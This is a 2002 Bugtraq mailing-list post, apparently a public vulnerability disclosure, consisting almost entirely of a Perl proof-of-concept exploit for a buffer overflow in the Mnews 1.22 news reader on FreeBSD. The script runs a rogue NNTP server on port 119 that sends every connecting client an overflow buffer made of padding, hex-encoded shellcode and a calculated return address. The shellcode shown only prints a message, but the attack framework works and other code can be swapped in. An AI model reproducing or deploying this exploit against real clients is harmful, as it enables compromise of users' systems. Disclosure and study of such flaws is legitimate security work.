Home page logo
/

bugtraq logo Bugtraq mailing list archives

Mnews 1.22 PoC exploit
From: zillion <zillion () snosoft com>
Date: Fri, 31 May 2002 19:37:42 -0400 (EDT)


#!/usr/bin/perl -w
#
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
# with the 4.5-RELEASE ports collection.
#
# This exploit is pretty harmless as it only prints a small message to
# stdout (NAI?).
#
# Written by zillion[at]safemode.org (!shit)
#
# http://www.safemode.org
# http://www.snosoft.com

use IO::Socket;

$shellcode =

        "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
        "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
        "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
        "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
        "\x23";

# normal \x90 nops don't work here..

$nop = "A";
$esp = 0xbfbff65e;
$off = "-70";
$size = 762;

for ($i = 0; $i < ($size - length($shellcode)); $i++) {
    $buffer .= "$nop";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));

printf("Starting to listen for incoming connections... buffer size
%d\n",length($buffer));
print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n");

my $sock = new IO::Socket::INET (
                                 LocalPort => 119,
                                 Proto => 'tcp',
                                 Listen => 1,
                                 Reuse => 1,
                                );

while($cl = $sock->accept()) {

sleep 1;
print $cl "200 $buffer\n";
sleep 3;

}







  By Date           By Thread  

Current thread:
  • Mnews 1.22 PoC exploit zillion (Jun 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault